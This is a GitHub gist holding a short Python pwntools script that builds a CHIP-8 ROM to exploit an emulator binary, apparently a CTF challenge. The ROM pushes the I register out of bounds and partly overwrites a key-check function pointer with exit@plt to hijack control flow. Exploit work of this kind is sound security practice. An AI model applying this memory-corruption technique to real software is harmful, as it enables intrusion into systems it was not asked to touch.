-
-
Save DavidBuchanan314/1aacfd5cc611306bdec8c9a6ef8d93c4 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
def set_reg(reg, value): | |
return 0x6000 | (reg << 8) | value | |
def add_i(reg): | |
return 0xF01E | (reg << 8) | |
def add_reg_byte(reg, byte): | |
return 0x7000 | (reg << 8) | byte | |
def jump(addr): | |
return lambda symbols: 0x1000 | symbols.get(addr, addr) | |
def store_regs_at_i(lastreg): | |
return 0xF055 | (lastreg << 8) | |
def skip_if_reg_equals_byte(reg, byte): | |
return 0x3000 | (reg << 8) | byte | |
elf = ELF("./chip8") | |
program = [ | |
# we want to set I to 0x3040 | |
# 0x3040 = 193 * 64 | |
set_reg(0xc, 193), | |
"add_i_loop", | |
add_i(0xc), # I += Vc | |
add_reg_byte(0xe, 1), # Ve += 1 | |
skip_if_reg_equals_byte(0xe, 64), | |
jump("add_i_loop"), | |
set_reg(0, elf.plt.exit & 0xff), | |
set_reg(1, (elf.plt.exit >> 8) & 0xff), | |
store_regs_at_i(1), # partial overwrite key check function pointer | |
set_reg(3, 3), | |
0xE39E, # "skip next if key 3 is pressed" | |
] | |
# "assemble" the ROM | |
symbols = {} | |
flat_program = [] | |
for thing in program: | |
if type(thing) is str: | |
symbols[thing] = 0x200 + len(flat_program) * 2 | |
else: | |
flat_program.append(thing) | |
rom = b"".join([(x if type(x) is int else x(symbols)).to_bytes(2, "big") for x in flat_program]) | |
log.info(f"Assembled ROM size: {len(rom)}") | |
open("exploit.rom", "wb").write(rom) | |
# start up the emulator | |
p = process(["./chip8", "exploit.rom"])#, env={"DISPLAY": ":0"}) | |
p.recvall() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment